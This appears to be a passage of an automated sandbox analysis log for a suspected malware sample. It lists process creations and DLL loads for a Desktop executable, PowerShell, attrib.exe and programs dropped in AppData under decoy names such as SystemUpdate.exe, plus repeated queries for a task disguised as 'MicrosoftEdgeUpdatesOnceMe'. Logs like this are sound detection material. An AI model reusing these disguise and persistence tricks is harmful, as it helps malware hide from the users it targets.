Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,4545882299053764737,12810531249114103037,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,6542869062695771062,17740834492215068834,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,3791569026057449520,15559375112028835645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,6770807407451840845,2731558754491331151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,293139969124192718,13583878474494082115,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,4903166560758941508,11037472114900692945,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1476 --field-trial-handle=2056,i,15588339443550297223,13273642016281484051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: wdscore.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: wimgapi.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: riched32.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\LineInst.exeSection loaded: apphelp.dllJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: apphelp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: aclayers.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: mpr.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: sfc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: sfc_os.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: version.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: cabinet.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: wtsapi32.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: winhttp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: kernel.appcore.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: winbrand.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: wldp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: dbghelp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: dbgcore.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: winbrand.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: wldp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: slc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: sppc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: mfc42u.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: wmsgapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: wdscore.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: uxtheme.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: netapi32.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: slc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: sppc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: wkscli.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: netutils.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: msasn1.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: sspicli.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: unbcl.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: fltlib.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: virtdisk.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: profapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: xmllite.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: sspicli.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: unbcl.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: fltlib.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: virtdisk.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: profapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: xmllite.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: riched32.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: riched20.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: usp10.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: msls31.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: wbemcomn.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: amsi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: userenv.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: policymanager.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: msvcp110_win.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: vds_ps.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: policymanager.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: msvcp110_win.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: winsta.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: iphlpapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: dhcpcsvc6.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: dhcpcsvc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: webio.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: mswsock.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: winnsi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: sspicli.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: dnsapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: rasadhlp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: fwpuclnt.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: schannel.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: mskeyprotect.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: ntasn1.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: ncrypt.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: ncryptsslp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: cryptsp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: rsaenh.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: cryptbase.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: gpapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: dpapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: windlp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: ntmarta.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: devrtl.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: textshaping.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: windowscodecs.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: textinputframework.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: coreuicomponents.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: coremessaging.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: coremessaging.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: wintypes.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: wintypes.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: wintypes.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: oleacc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: dataexchange.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: d3d11.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: dcomp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: dxgi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: twinapi.appcore.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: sxs.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: winbrand.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: wldp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\vdsldr.exeSection loaded: atl.dll
Source: C:\Windows\System32\vdsldr.exeSection loaded: vdsutil.dll
Source: C:\Windows\System32\vdsldr.exeSection loaded: bcd.dll
Source: C:\Windows\System32\vdsldr.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\vdsldr.exeSection loaded: vds_ps.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: version.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: python3.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: libffi-7.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: napinsp.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: wshbth.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: winrnr.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: dinput8.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: inputhost.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: devenum.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: devobj.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\WinHex.exeSection loaded: msdmo.dll
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\SystemUpdate.exeSection loaded: version.dll
Source: C:\Users\user\AppData\SystemUpdate.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\SystemUpdate.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\SystemUpdate.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\SystemUpdate.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\SystemUpdate.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
